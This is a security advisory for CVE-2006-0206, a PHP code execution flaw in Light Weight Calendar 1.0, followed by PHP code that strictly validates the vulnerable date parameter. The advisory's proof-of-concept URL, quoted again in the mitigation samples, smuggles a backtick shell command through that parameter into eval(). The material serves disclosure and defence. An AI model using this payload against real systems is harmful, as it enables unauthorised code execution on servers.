PHP Code Execution in Light Weight Calendar

Summary

Vulnerability: PHP Code Execution in Light Weight Calendar
Discovered: 2006.01.12
Last Update: 0 n/a
ID: EV0029
CVE: CVE-2006-0206
Risk Level: high
Type: PHP Code Execution
Status: Unpatched
Vendor: n/a
Vulnerable Software: Light Weight Calendar (http://sourceforge.net/projects/lwcal/)
Version: 1.0
PoC/Exploit: Available
Solution: Not available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)

Description

A PHP code execution vulnerability was found in the Light Weight Calendar (http://sourceforge.net/projects/lwcal/) script.

Vulnerable script: cal.php

The eval() function is called with a user-supplied parameter that is not properly sanitized. This can be used to execute arbitrary PHP code.

System access is possible.

PoC/Exploit

PHP code execution example:
http://host/lwc/index.php?stam=1928504&date=20050901);%20echo%20(%60ls%20-la%60&View=month

Solution

Solution for "PHP Code Execution in Light Weight Calendar" is not available. Check vendor's website for updates.
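
While no vendor fix exists, one way to contain this class of bug is to parse the request value strictly before any code, eval() included, can see it. The following is an added example, not code from Light Weight Calendar or from eVuln; the function name parse_yyyymmdd is hypothetical, and the YYYYMMDD format is an assumption inferred from the value 20050901 in the PoC above.

```php
<?php
// Added example: NOT Light Weight Calendar's own code.
// parse_yyyymmdd() is a hypothetical helper; the YYYYMMDD format is assumed
// from the "date=20050901" value shown in the PoC.

/**
 * Return [year, month, day] when $raw is a real calendar date written as
 * exactly eight ASCII digits, otherwise null. Because only digits pass,
 * nothing accepted here can carry PHP syntax such as ")" or ";".
 */
function parse_yyyymmdd($raw): ?array
{
    // Arrays (date[]=...) and other non-string values are rejected outright.
    // \A and \z anchor the whole string, so a trailing newline cannot slip by.
    if (!is_string($raw) || preg_match('/\A[0-9]{8}\z/', $raw) !== 1) {
        return null;
    }

    $year  = (int) substr($raw, 0, 4);
    $month = (int) substr($raw, 4, 2);
    $day   = (int) substr($raw, 6, 2);

    // checkdate() rejects impossible dates such as month 13 or February 31.
    return checkdate($month, $day, $year) ? [$year, $month, $day] : null;
}

// Constructed sample inputs, as PHP would see them after URL decoding.
$samples = [
    '20050901',                   // ordinary request value
    '20050901); echo (`ls -la`',  // decoded "date" value from the PoC
    '20050231',                   // eight digits, but not a real date
    "20050901\n",                 // trailing newline
    ['20050901'],                 // array form: date[]=20050901
];

foreach ($samples as $sample) {
    $parsed = parse_yyyymmdd($sample);
    printf(
        "%-34s => %s\n",
        json_encode($sample),
        $parsed === null
            ? 'rejected (answer with HTTP 400)'
            : vsprintf('%04d-%02d-%02d', $parsed)
    );
}
```

Only the integers returned by the helper should be passed on; the raw request string should never be concatenated into an eval() argument.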
